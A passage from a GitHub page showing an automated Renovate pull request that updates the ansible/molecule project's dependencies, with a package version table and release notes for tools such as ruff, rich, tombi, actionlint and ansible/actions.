([#&#8203;1878](https://redirect.github.com/j178/prek/pull/1878))
- Ensure quotes are added for non-string revisions in `auto-update`
([#&#8203;1936](https://redirect.github.com/j178/prek/pull/1936))

##### Documentation

- Update docs for case of hooks modifying files with a non-zero exit
code ([#&#8203;1879](https://redirect.github.com/j178/prek/pull/1879))

##### Contributors

- [@&#8203;RicardoVercetti](https://redirect.github.com/RicardoVercetti)
-
[@&#8203;nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
- [@&#8203;renovate](https://redirect.github.com/renovate)
- [@&#8203;sadjow](https://redirect.github.com/sadjow)
- [@&#8203;j178](https://redirect.github.com/j178)

</details>

<details>
<summary>rhysd/actionlint (rhysd/actionlint)</summary>

###
[`v1.7.12`](https://redirect.github.com/rhysd/actionlint/blob/HEAD/CHANGELOG.md#v1712---2026-03-30)

[Compare
Source](https://redirect.github.com/rhysd/actionlint/compare/v1.7.11...v1.7.12)

- Support the [`timezone` configuration in
`on.schedule`](https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#onschedule)
with checks for IANA timezone string. See the
[documentation](https://redirect.github.com/rhysd/actionlint/blob/main/docs/checks.md#check-cron-syntax-and-timezone)
for more details. Note that actionlint starts to embed the timezone
database in the executables from this version so the binary sizes
slightly increase.
([#&#8203;641](https://redirect.github.com/rhysd/actionlint/issues/641),
thanks
[@&#8203;martincostello](https://redirect.github.com/martincostello))
  ```yaml
  on:
    schedule:
      # ERROR: The timezone is not a valid IANA timezone string
      - cron: '*/5 * * * *'
        timezone: 'Asia/Somewhere'
  ```
- Support the [`jobs.<job_name>.environment.deployment`
configuration](https://docs.github.com/en/actions/how-tos/deploy/configure-and-manage-deployments/control-deployments#using-environments-without-deployments).
([#&#8203;639](https://redirect.github.com/rhysd/actionlint/issues/639),
thanks [@&#8203;springmeyer](https://redirect.github.com/springmeyer))
- Support the [`macos-26-intel` runner
label](https://github.blog/changelog/2026-02-26-macos-26-is-now-generally-available-for-github-hosted-runners/).
([#&#8203;629](https://redirect.github.com/rhysd/actionlint/issues/629),
thanks [@&#8203;hugovk](https://redirect.github.com/hugovk))
- Fix the [table of webhook activity
types](https://redirect.github.com/rhysd/actionlint/blob/main/all_webhooks.go)
are outdated by rebuilding the [script to scrape the
table](https://redirect.github.com/rhysd/actionlint/tree/main/scripts/generate-webhook-events)
from scratch.
- Support Go 1.26 and drop the support for Go 1.24. Now supported
versions are 1.25 and 1.26.
- Tests are run on arm64 Windows in CI.
- Update the popular actions data set to the latest.

\[Changes]\[v1.7.12]

<a id="v1.7.11"></a>

</details>

<details>
<summary>Textualize/rich (rich)</summary>

###
[`v15.0.0`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1500---2026-04-12)

[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.4...v15.0.0)

##### Changed

- Breaking change: Dropped support for Python3.8

##### Fixed

- Fixed empty print ignoring the `end` parameter
[#&#8203;4075](https://redirect.github.com/Textualize/rich/pull/4075)
- Fixed `Text.from_ansi` removing newlines
[#&#8203;4076](https://redirect.github.com/Textualize/rich/pull/4076)
- Fixed `FileProxy.isatty` not proxying
[#&#8203;4077](https://redirect.github.com/Textualize/rich/pull/4077)
- Fixed inline code in Markdown tables cells
[#&#8203;4079](https://redirect.github.com/Textualize/rich/pull/4079)

###
[`v14.3.4`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1434---2026-04-11)

[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.3...v14.3.4)

##### Changed

- Improved import time with lazy loading
[#&#8203;4070](https://redirect.github.com/Textualize/rich/pull/4070)
- Changed link id generation to avoid random number generation at
runtime
[#&#8203;3845](https://redirect.github.com/Textualize/rich/pull/3845)

</details>

<details>
<summary>astral-sh/ruff (ruff)</summary>

###
[`v0.15.12`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01512)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.11...0.15.12)

Released on 2026-04-24.

##### Preview features

- Implement `#ruff:file-ignore` file-level suppressions
([#&#8203;23599](https://redirect.github.com/astral-sh/ruff/pull/23599))
- Implement `#ruff:ignore` logical-line suppressions
([#&#8203;23404](https://redirect.github.com/astral-sh/ruff/pull/23404))
- Revert preview changes to displayed diagnostic severity in LSP
([#&#8203;24789](https://redirect.github.com/astral-sh/ruff/pull/24789))
- \[`airflow`] Implement `task-branch-as-short-circuit` (`AIR004`)
([#&#8203;23579](https://redirect.github.com/astral-sh/ruff/pull/23579))
- \[`flake8-bugbear`] Fix `break`/`continue` handling in
`loop-iterator-mutation` (`B909`)
([#&#8203;24440](https://redirect.github.com/astral-sh/ruff/pull/24440))
- \[`pylint`] Fix `PLC2701` for type parameter scopes
([#&#8203;24576](https://redirect.github.com/astral-sh/ruff/pull/24576))

##### Rule changes

- \[`pandas-vet`] Suggest `.array` as well in `PD011`
([#&#8203;24805](https://redirect.github.com/astral-sh/ruff/pull/24805))

##### CLI

- Respect default Unix permissions for cache files
([#&#8203;24794](https://redirect.github.com/astral-sh/ruff/pull/24794))

##### Documentation

- \[`pylint`] Fix `PLR0124` description not to claim self-comparison
always returns the same value
([#&#8203;24749](https://redirect.github.com/astral-sh/ruff/pull/24749))
- \[`pyupgrade`] Expand docs on reusable `TypeVar`s and scoping
(`UP046`)
([#&#8203;24153](https://redirect.github.com/astral-sh/ruff/pull/24153))
- Improve rules table accessibility
([#&#8203;24711](https://redirect.github.com/astral-sh/ruff/pull/24711))

##### Contributors

- [@&#8203;dylwil3](https://redirect.github.com/dylwil3)
- [@&#8203;AlexWaygood](https://redirect.github.com/AlexWaygood)
- [@&#8203;woodruffw](https://redirect.github.com/woodruffw)
- [@&#8203;avasis-ai](https://redirect.github.com/avasis-ai)
- [@&#8203;Dev-iL](https://redirect.github.com/Dev-iL)
- [@&#8203;denyszhak](https://redirect.github.com/denyszhak)
- [@&#8203;ShipItAndPray](https://redirect.github.com/ShipItAndPray)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;augustelalande](https://redirect.github.com/augustelalande)
- [@&#8203;amyreese](https://redirect.github.com/amyreese)
- [@&#8203;majiayu000](https://redirect.github.com/majiayu000)

###
[`v0.15.11`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01511)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.10...0.15.11)

Released on 2026-04-16.

##### Preview features

- \[`ruff`] Ignore `RUF029` when function is decorated with
`asynccontextmanager`
([#&#8203;24642](https://redirect.github.com/astral-sh/ruff/pull/24642))
- \[`airflow`] Implement `airflow-xcom-pull-in-template-string`
(`AIR201`)
([#&#8203;23583](https://redirect.github.com/astral-sh/ruff/pull/23583))
- \[`flake8-bandit`] Fix `S103` false positives and negatives in mask
analysis
([#&#8203;24424](https://redirect.github.com/astral-sh/ruff/pull/24424))

##### Bug fixes

- \[`flake8-async`] Omit overridden methods for `ASYNC109`
([#&#8203;24648](https://redirect.github.com/astral-sh/ruff/pull/24648))

##### Documentation

- \[`flake8-async`] Add override mention to `ASYNC109` docs
([#&#8203;24666](https://redirect.github.com/astral-sh/ruff/pull/24666))
- Update Neovim config examples to use `vim.lsp.config`
([#&#8203;24577](https://redirect.github.com/astral-sh/ruff/pull/24577))

##### Contributors

- [@&#8203;augustelalande](https://redirect.github.com/augustelalande)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;benberryallwood](https://redirect.github.com/benberryallwood)
- [@&#8203;charliermarsh](https://redirect.github.com/charliermarsh)
- [@&#8203;Dev-iL](https://redirect.github.com/Dev-iL)

###
[`v0.15.10`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01510)

[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.9...0.15.10)

Released on 2026-04-09.

##### Preview features

- \[`flake8-logging`] Allow closures in except handlers (`LOG004`)
([#&#8203;24464](https://redirect.github.com/astral-sh/ruff/pull/24464))
- \[`flake8-self`] Make `SLF` diagnostics robust to non-self-named
variables
([#&#8203;24281](https://redirect.github.com/astral-sh/ruff/pull/24281))
- \[`flake8-simplify`] Make the fix for `collapsible-if` safe in
`preview` (`SIM102`)
([#&#8203;24371](https://redirect.github.com/astral-sh/ruff/pull/24371))

##### Bug fixes

- Avoid emitting multi-line f-string elements before Python 3.12
([#&#8203;24377](https://redirect.github.com/astral-sh/ruff/pull/24377))
- Avoid syntax error from `E502` fixes in f-strings and t-strings
([#&#8203;24410](https://redirect.github.com/astral-sh/ruff/pull/24410))
- Strip form feeds from indent passed to `dedent_to`
([#&#8203;24381](https://redirect.github.com/astral-sh/ruff/pull/24381))
- \[`pyupgrade`] Fix panic caused by handling of octals (`UP012`)
([#&#8203;24390](https://redirect.github.com/astral-sh/ruff/pull/24390))
- Reject multi-line f-string elements before Python 3.12
([#&#8203;24355](https://redirect.github.com/astral-sh/ruff/pull/24355))

##### Rule changes

- \[`ruff`] Treat f-string interpolation as potential side effect
(`RUF019`)
([#&#8203;24426](https://redirect.github.com/astral-sh/ruff/pull/24426))

##### Server

- Add support for custom file extensions
([#&#8203;24463](https://redirect.github.com/astral-sh/ruff/pull/24463))

##### Documentation

- Document adding fixes in CONTRIBUTING.md
([#&#8203;24393](https://redirect.github.com/astral-sh/ruff/pull/24393))
- Fix JSON typo in settings example
([#&#8203;24517](https://redirect.github.com/astral-sh/ruff/pull/24517))

##### Contributors

- [@&#8203;charliermarsh](https://redirect.github.com/charliermarsh)
- [@&#8203;dylwil3](https://redirect.github.com/dylwil3)
- [@&#8203;silverstein](https://redirect.github.com/silverstein)
- [@&#8203;anishgirianish](https://redirect.github.com/anishgirianish)
- [@&#8203;shizukushq](https://redirect.github.com/shizukushq)
- [@&#8203;zanieb](https://redirect.github.com/zanieb)
- [@&#8203;AlexWaygood](https://redirect.github.com/AlexWaygood)

</details>

<details>
<summary>tombi-toml/tombi (tombi)</summary>

###
[`v0.10.2`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.2)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.2 -->

#### What's Changed

##### 🚀 New Features

- Add references support for Cargo and pyproject workspaces by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1821](https://redirect.github.com/tombi-toml/tombi/pull/1821)

##### 🐛 Bug Fixes

- fix(lsp): resolve type definitions for scalar bindings by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1820](https://redirect.github.com/tombi-toml/tombi/pull/1820)
- fix(vscode): allow spaced toml fences by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1816](https://redirect.github.com/tombi-toml/tombi/pull/1816)

##### 🛠️ Other Changes

- fix(pyproject): link build-system requires by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1822](https://redirect.github.com/tombi-toml/tombi/pull/1822)
- feat(vscode): add TOML configuration defaults by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1818](https://redirect.github.com/tombi-toml/tombi/pull/1818)
- Deprecate path declaration navigation in pyproject and cargo by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1823](https://redirect.github.com/tombi-toml/tombi/pull/1823)
- Improve docs tables and workspace goto navigation by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1825](https://redirect.github.com/tombi-toml/tombi/pull/1825)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2>

###
[`v0.10.1`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.1)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.1 -->

#### What's Changed

##### 🚀 New Features

- Fix tombi config path resolution and completions by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1807](https://redirect.github.com/tombi-toml/tombi/pull/1807)

##### 🐛 Bug Fixes

- fix: keep root hover range on the current key-value by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1812](https://redirect.github.com/tombi-toml/tombi/pull/1812)
- fix(config): reject empty schema glob patterns by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1814](https://redirect.github.com/tombi-toml/tombi/pull/1814)

##### 🛠️ Other Changes

- Add schema exclude support by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1813](https://redirect.github.com/tombi-toml/tombi/pull/1813)
- docs: refine formatter intro wording by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1815](https://redirect.github.com/tombi-toml/tombi/pull/1815)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1>

###
[`v0.10.0`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.0)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0)

<!-- Release notes generated using configuration in .github/release.yml
at v0.10.0 -->

#### What's Changed

The file path specification in `.config/tombi.toml` has been modified to
be searched starting from its parent directory, rather than from
`.config/`.

##### 🚨 Breaking Changes

- fix: add leading comment handling for empty tables and arrays in
formatting by [@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1800](https://redirect.github.com/tombi-toml/tombi/pull/1800)
- fix: resolve project-root paths from `.config/tombi.toml` config by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1802](https://redirect.github.com/tombi-toml/tombi/pull/1802)

##### 🐛 Bug Fixes

- fix: resolve schema paths from config base dir by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1806](https://redirect.github.com/tombi-toml/tombi/pull/1806)

##### 🛠️ Other Changes

- fix: remove redundant explanation for group-blank-lines-limit and
table-blank-lines by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1799](https://redirect.github.com/tombi-toml/tombi/pull/1799)
- Strengthen README overview by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1801](https://redirect.github.com/tombi-toml/tombi/pull/1801)
- docs: correct terminology for auto sorting in documentation by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1805](https://redirect.github.com/tombi-toml/tombi/pull/1805)
- ci: cache TOMBI\_CACHE\_HOME in CI by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1804](https://redirect.github.com/tombi-toml/tombi/pull/1804)
- Add schema catalog path examples by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1803](https://redirect.github.com/tombi-toml/tombi/pull/1803)

**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0>

###
[`v0.9.26`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.9.26)

[Compare
Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.25...v0.9.26)

<!-- Release notes generated using configuration in .github/release.yml
at v0.9.26 -->

#### What's Changed

##### 🚀 New Features

- feat: add example paths for schema in JSON and Rust definitions by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1798](https://redirect.github.com/tombi-toml/tombi/pull/1798)
- feat(formatter): add blank line spacing options by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1792](https://redirect.github.com/tombi-toml/tombi/pull/1792)

##### 🐛 Bug Fixes

- fix(vscode): enable markdown TOML fence injection by
[@&#8203;ya7010](https://redirect.github.com/ya7010) in
[#&#8203;1794](https://redirect.github.com/tombi-toml/tombi/pull/1794)
- chore: update codeblock ru

> ✂ **Note**
> 
> PR body was truncated to here.


</details>

---

### Configuration

📅 **Schedule**: (in timezone UTC)

- Branch creation
  - "before 4am on monday"
- Automerge
  - Between 12:00 AM and 03:59 AM, only on Monday (`* 0-3 * * 1`)

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/ansible/molecule).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuMTU5LjIiLCJ0YXJnZXRCcmFuY2giOiJtYWluIiwibGFiZWxzIjpbImNob3JlIiwiZGVwZW5kZW5jaWVzIl19-->

---------

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Rakesh S <rakesh.s552004@gmail.com>
Dotify71 pushed a commit to Dotify71/molecule that referenced this pull request Jun 4, 2026
@renovate @rockygeekz @Dotify71
chore(deps): update all dependencies (ansible#4621)
6c4a2d8 
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.

This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) | Type |
Update | Pending |
|---|---|---|---|---|---|---|
|
[ansible-navigator](https://redirect.github.com/ansible/ansible-navigator)
([changelog](https://redirect.github.com/ansible/ansible-navigator/releases))
| `26.1.3` → `26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/ansible-navigator/26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ansible-navigator/26.1.3/26.4.0?slim=true)
| dependency-groups | minor | |
| [ansible/actions](https://redirect.github.com/ansible/actions) |
`v0.5.1` → `v1.1.2` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2factions/v1.1.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2factions/v0.5.1/v1.1.2?slim=true)
| repository | major | |
|
[ansible/ansible-lint](https://redirect.github.com/ansible/ansible-lint)
| `v26.2.0` → `v26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2fansible-lint/v26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2fansible-lint/v26.2.0/v26.4.0?slim=true)
| repository | minor | |
|
[ansible/team-devtools](https://redirect.github.com/ansible/team-devtools)
| `v26.2.0` → `v26.4.0` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/ansible%2fteam-devtools/v26.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/ansible%2fteam-devtools/v26.2.0/v26.4.0?slim=true)
| repository | minor | |
|
[astral-sh/uv-pre-commit](https://redirect.github.com/astral-sh/uv-pre-commit)
| `0.10.7` → `0.11.8` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/astral-sh%2fuv-pre-commit/0.11.8?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/astral-sh%2fuv-pre-commit/0.10.7/0.11.8?slim=true)
| repository | minor | `0.11.10` (+1) |
| [biomejs/pre-commit](https://redirect.github.com/biomejs/pre-commit) |
`v2.4.4` → `v2.4.14` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/biomejs%2fpre-commit/v2.4.14?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/biomejs%2fpre-commit/v2.4.4/v2.4.14?slim=true)
| repository | patch | |
| [build](https://redirect.github.com/pypa/build)
([changelog](https://build.pypa.io/en/stable/changelog.html)) | `1.4.2`
→ `1.5.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/build/1.5.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/build/1.4.2/1.5.0?slim=true)
| dependency-groups | minor | |
| [click](https://redirect.github.com/pallets/click)
([changelog](https://click.palletsprojects.com/page/changes/)) | `8.3.2`
→ `8.3.3` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/click/8.3.3?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/click/8.3.2/8.3.3?slim=true)
| project.dependencies | patch | |
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2`
→ `3.29.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.29.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.25.2/3.29.0?slim=true)
| dependency-groups | minor | |
| [prek](https://prek.j178.dev/)
([source](https://redirect.github.com/j178/prek),
[changelog](https://redirect.github.com/j178/prek/blob/master/CHANGELOG.md))
| `0.3.8` → `0.3.11` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/prek/0.3.11?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/prek/0.3.8/0.3.11?slim=true)
| dependency-groups | patch | `0.3.13` (+1) |
| [rhysd/actionlint](https://redirect.github.com/rhysd/actionlint) |
`v1.7.11` → `v1.7.12` |
![age](https://developer.mend.io/api/mc/badges/age/github-tags/rhysd%2factionlint/v1.7.12?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/github-tags/rhysd%2factionlint/v1.7.11/v1.7.12?slim=true)
| repository | patch | |
| [rich](https://redirect.github.com/Textualize/rich) | `14.3.3` →
`15.0.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/rich/15.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/rich/14.3.3/15.0.0?slim=true)
| project.dependencies | major | |
| [ruff](https://docs.astral.sh/ruff)
([source](https://redirect.github.com/astral-sh/ruff),
[changelog](https://redirect.github.com/astral-sh/ruff/blob/main/CHANGELOG.md))
| `0.15.9` → `0.15.12` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/ruff/0.15.12?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/ruff/0.15.9/0.15.12?slim=true)
| dependency-groups | patch | |
| [tombi](https://redirect.github.com/tombi-toml/tombi) | `0.9.14` →
`0.10.2` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tombi/0.10.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tombi/0.9.14/0.10.2?slim=true)
| dependency-groups | minor | `0.10.5` (+2) |
| [tox](https://redirect.github.com/tox-dev/tox)
([changelog](https://tox.wiki/en/latest/changelog.html)) | `4.52.0` →
`4.53.1` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tox/4.53.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tox/4.52.0/4.53.1?slim=true)
| dependency-groups | minor | |
| [tox-uv](https://redirect.github.com/tox-dev/tox-uv#tox-uv)
([changelog](https://redirect.github.com/tox-dev/tox-uv/releases)) |
`1.34.0` → `1.35.1` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/tox-uv/1.35.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/tox-uv/1.34.0/1.35.1?slim=true)
| dependency-groups | minor | `1.35.2` |
| [types-jsonschema](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/jsonschema.md))
| `4.26.0.20260402` → `4.26.0.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-jsonschema/4.26.0.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-jsonschema/4.26.0.20260402/4.26.0.20260408?slim=true)
| dependency-groups | patch | |
| [types-pexpect](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/pexpect.md))
| `4.9.0.20260127` → `4.9.0.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-pexpect/4.9.0.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-pexpect/4.9.0.20260127/4.9.0.20260408?slim=true)
| dependency-groups | patch | |
| [types-pyyaml](https://redirect.github.com/python/typeshed)
([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/PyYAML.md))
| `6.0.12.20250915` → `6.0.12.20260408` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/types-pyyaml/6.0.12.20260408?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/types-pyyaml/6.0.12.20250915/6.0.12.20260408?slim=true)
| dependency-groups | patch | |

Note: The `pre-commit` manager in Renovate is not supported by the
`pre-commit` maintainers or community. Please do not report any problems
there, instead [create a Discussion in the Renovate
repository](https://redirect.github.com/renovatebot/renovate/discussions/new)
if you have any questions.

---

### Release Notes

<details>
<summary>ansible/ansible-navigator (ansible-navigator)</summary>

###
[`v26.4.0`](https://redirect.github.com/ansible/ansible-navigator/releases/tag/v26.4.0)

[Compare
Source](https://redirect.github.com/ansible/ansible-navigator/compare/v26.1.3...v26.4.0)

#### Maintenance

- chore(deps): update all dependencies
([#&#8203;2106](https://redirect.github.com/ansible/ansible-navigator/issues/2106))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;2100](https://redirect.github.com/ansible/ansible-navigator/issues/2100))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- ci: Fix CI, assisted by AI
([#&#8203;2104](https://redirect.github.com/ansible/ansible-navigator/issues/2104))
[@&#8203;Andersson007](https://redirect.github.com/Andersson007)

</details>

<details>
<summary>ansible/actions (ansible/actions)</summary>

###
[`v1.1.2`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.2)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.1...v1.1.2)

#### Fixes

- fix: make renovate and md hook use version from action
([#&#8203;112](https://redirect.github.com/ansible/actions/issues/112))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: force use of newer node
([#&#8203;121](https://redirect.github.com/ansible/actions/issues/121))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies pep621
([#&#8203;120](https://redirect.github.com/ansible/actions/issues/120))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;119](https://redirect.github.com/ansible/actions/issues/119))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.1.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.1.0...v1.1.1)

#### Fixes

- fix: address issue with shellcheck calling
([#&#8203;118](https://redirect.github.com/ansible/actions/issues/118))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies pep621
([#&#8203;117](https://redirect.github.com/ansible/actions/issues/117))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;116](https://redirect.github.com/ansible/actions/issues/116))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update dependencies
([#&#8203;115](https://redirect.github.com/ansible/actions/issues/115))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#&#8203;114](https://redirect.github.com/ansible/actions/issues/114))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;113](https://redirect.github.com/ansible/actions/issues/113))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.1.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.0)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1.0.1...v1.1.0)

#### Features

- feat: add pyright hook definition
([#&#8203;111](https://redirect.github.com/ansible/actions/issues/111))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Fixes

- fix: display gitleaks version before calling it
([#&#8203;108](https://redirect.github.com/ansible/actions/issues/108))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: allow renovate to create up to 3 PRs
([#&#8203;107](https://redirect.github.com/ansible/actions/issues/107))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update actions/download-artifact action
([#&#8203;109](https://redirect.github.com/ansible/actions/issues/109))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#&#8203;110](https://redirect.github.com/ansible/actions/issues/110))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#&#8203;106](https://redirect.github.com/ansible/actions/issues/106))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
[`v1.0.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.1)

[Compare
Source](https://redirect.github.com/ansible/actions/compare/v1...v1.0.1)

#### Fixes

- fix: configure renovate to bump minimal versions on security alerts
([#&#8203;104](https://redirect.github.com/ansible/actions/issues/104))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make codecov curl validation retry
([#&#8203;103](https://redirect.github.com/ansible/actions/issues/103))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)
- fix: run codespell as a tool
([#&#8203;102](https://redirect.github.com/ansible/actions/issues/102))
[@&#8203;ssbarnea](https://redirect.github.com/ssbarnea)

#### Maintenance

- chore(deps): update all dependencies to
[`bbbca2d`](https://redirect.github.com/ansible/actions/commit/bbbca2d)
([#&#8203;100](https://redirect.github.com/ansible/actions/issues/100))
@&#8203;[renovate\[bot\]](https://redirect.github.com/apps/renovate)

###
